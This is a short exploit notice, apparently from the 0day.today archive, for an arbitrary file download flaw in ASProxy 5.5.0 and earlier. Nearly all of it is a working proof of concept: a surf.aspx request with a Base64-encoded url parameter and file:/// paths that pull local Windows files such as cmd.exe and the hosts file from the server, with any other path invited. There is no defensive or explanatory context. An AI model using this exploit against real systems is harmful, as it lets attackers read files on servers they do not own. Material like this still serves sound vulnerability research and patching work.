ASProxy <= 5.5.0 Arbitrary File Download Vulnerability
PHP:
PoC:
http://[host]/surf.aspx?dec=1&url=[Base64code]
Enter URL:
file:///C:/windows/system32/cmd.exe
file:///C:/windows/system32/drivers/etc/hosts
file:///C:/Program Files/Internet Explorer/iexplore.exe
...any other path
# Â 0day.today [2017-11-15] Â #
